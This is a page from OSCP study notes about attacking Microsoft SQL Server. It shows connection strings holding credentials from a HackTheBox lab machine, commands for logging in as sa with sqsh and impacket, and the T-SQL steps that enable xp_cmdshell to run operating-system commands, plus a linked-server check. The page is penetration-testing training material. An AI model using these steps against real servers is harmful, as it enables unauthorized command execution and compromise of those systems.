🐝
OSCP 2022 Materials
  • General
    • Whoami
    • Resources
    • Frequently Asked Questions
    • Shared Resource
  • Enumeration
    • Foreword
    • FTP
    • SMTP
    • DNS
    • Finger
    • HTTP/ HTTPS
      • Login Attacks
        • PHP Logins
      • XSS
      • LFI ( LFI -> RCE )
      • RFI ( RFI -> RCE )
      • CMS Exploitation
        • Wordpress
        • Magento
        • Bludit
        • Tomcat
        • Drupal
      • PHPMyAdmin
    • Kerberos
    • POP3
    • SMB
    • IMAP
    • SNMP
    • IRC
    • RSync
    • MSSQL
    • NFS
    • REDIS
    • Port Forwarding
  • Linux Post Exploitation
    • Post Exploit Checks
    • Pivoting ( ProxyChains )
  • Windows Post Exploitation
    • Post Exploit Checks
    • Active Directory ( Recon -> PE)
    • Notes
      • Powershell
      • Commands
  • Buffer Overflow
    • Hackthebox
    • TryHackMe
  • Mobile Pentesting
    • Android Pentesting
      • Lab TroubleShoot
      • Root Detection Bypass ( Manual )
      • Physical Device
  • MISC
    • Useful
    • Web
    • Linux
    • Application Specific
    • Programming Notes for Offensive Security
      • Python
    • Forensics
      • Disk Forensics
    • Inspection
    • Troubleshooting
      • Mouse Flickering
Powered by GitBook
On this page
  • Identifying Passwords
  • Connecting to server
  • Code Execution

Was this helpful?

  1. Enumeration

MSSQL

SQL Server is common service when exposed to the outer world.

Requires: With valid credentials commands can be executed on the victim

Identifying Passwords

# from tally htb
SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;

# example format
PROVIDER=DNOSCPDB;DATA SOURCE=HOME;User ID=sa;PWD=cyb3rs3cn00b;DATABASE=rfdb

Connecting to server

# sqsh -S $ip -U sa -P $pass
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"

# via mysqlclient
impacket-mssqlclient -db orcharddb -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine

Code Execution

EXEC sp_configure 'show advanced options', 1;
go
RECONFIGURE; 
go
EXEC sp_configure 'xp_cmdshell', 1;
go
RECONFIGURE; 
go
xp_cmdshell 'whoami';
go

# Check for linked servers
sp_linkedservers
go
PreviousRSyncNextNFS

Last updated 2 years ago

Was this helpful?

https://ranakhalil101.medium.com/hack-the-box-tally-writeup-w-o-metasploit-b8bce0684ad3